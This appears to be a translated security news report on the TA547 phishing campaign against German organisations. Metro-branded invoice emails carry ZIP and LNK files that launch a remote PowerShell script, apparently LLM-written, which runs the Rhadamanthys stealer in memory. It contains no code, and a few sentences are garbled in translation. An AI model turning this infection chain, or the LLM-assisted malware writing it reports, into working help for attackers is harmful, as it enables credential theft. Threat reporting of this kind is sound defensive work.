Threat actor TA547 has been observed targeting German organizations along with known thief Rhadamanthys.
According to a recent report from Proofpoint, this is the first time this threat actor has been associated with such activity.
What is particularly intriguing according to the researchers is the actor’s apparent use of a PowerShell script likely generated by large language models (LLMs) such as ChatGPT, Gemini or CoPilot.
Posing as the famous German retail company Metro, TA547 sent invoice-related emails. These emails, sent to numerous organizations across different industries in Germany, contained a password-protected ZIP file hosting an LNK file.
Upon execution, this LNK file triggered PowerShell to launch a remote script, ultimately loading and running the Rhadamanthys Malware directly into system memory, thus avoiding the need to write to disk.
Notably, the PowerShell script exhibited characteristics unusual in a typical threat actor or in a legitimate programmer’s code, indicating possible LLM involvement. These factors included grammatically correct and hyper-specific comments above each script component, a hallmark of LLM-generated content.
This campaign showcases the strategic change of TA547, including the adoption of compressed LNK and the introduction of Rhadamanthys. This also highlights how threat actors exploit suspected LLM-generated content in their malicious efforts.
According to ProofpointHowever, while malicious actors can use LLMs to understand complex attack chains and potentially improve their campaigns, this does not change the functionality or effectiveness of the malware. In fact, the company believes that most behavior-based detection mechanisms remain effective regardless of the malware’s origin.
“In the same way that phishing emails generated by LLM to commit business email compromise (BEC) use the same characteristics as human-generated content and are detected by automated detections, malware or Scripts that incorporate machine-generated code will continue to run the same way. a sandbox (or on a host), triggering the same automated defenses,” the company explained.